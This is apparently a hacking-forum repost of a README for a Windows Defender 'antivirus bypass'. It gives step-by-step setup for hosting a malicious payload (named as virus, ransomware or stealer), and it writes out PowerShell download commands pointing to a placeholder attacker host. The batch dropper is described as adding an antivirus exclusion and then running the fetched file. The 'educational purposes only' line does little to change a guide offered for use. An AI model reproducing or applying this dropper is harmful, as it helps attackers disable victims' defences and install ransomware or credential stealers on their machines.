11 Years of Service
90%
Antivirus Bypass
Fully undetectable bypass for Windows Defender and every other antivirus (FUD at the moment). Works by downloading a bat file that adds an exclusion for exe files, and then downloads your file and runs it.
Antivirus Bypass
Fully undetectable bypass for Windows Defender and every other antivirus (FUD at the moment). Works by downloading a bat file that adds an exclusion for exe files, and then downloads your file and runs it.
Fully undetectable bypass for Windows Defender and every other antivirus (FUD at the moment). Works by downloading a bat file that adds an exclusion for exe files, and then downloads your file and runs it.
This project is intended for research/educational purposes only.
Setup
If you already have a webserver, skip to step 2.
If you already have a webserver, skip to step 2.
1, To start setting up the bypass, you will need a webserver, you can create one by heading over to
and creating an HTML, CSS & JS repl, after that, you will need to run the repl. It should then open up a website preview and give you the webserver URL above it.
This link is hidden for visitors. Please Log in or register now.
2, Upload the file you wish to execute (virus, ransomware, stealer, etc) to the webserver and rename the file to installer.exe.
3, Edit line 31 in the installer.bat file:
Powershell -Command "Invoke-Webrequest 'https://YOURSITE.COM/installer.exe' -OutFile installer.exe"
Change
to your webserver URL. If you use replit, it should look like this:
Change
This link is hidden for visitors. Please Log in or register now.
This link is hidden for visitors. Please Log in or register now.
4, Upload the installer.bat to your webserver. 5, Edit line 4 in the main.bat file:
Powershell -Command "Invoke-Webrequest 'https://YOURSITE.COM/installer.bat' -OutFile installer.bat"
Replace
with your webserver URL and the path to the installer.bat file. If you use replit, it should look like this:
Replace
This link is hidden for visitors. Please Log in or register now.
This link is hidden for visitors. Please Log in or register now.
6, Done. The file you would use to bypass windows defender would be main.bat. You can convert it to an executable but this will raise the number of detections. If this helped you, make sure to star this repository (;
Download:
To see this hidden content, you must like this content.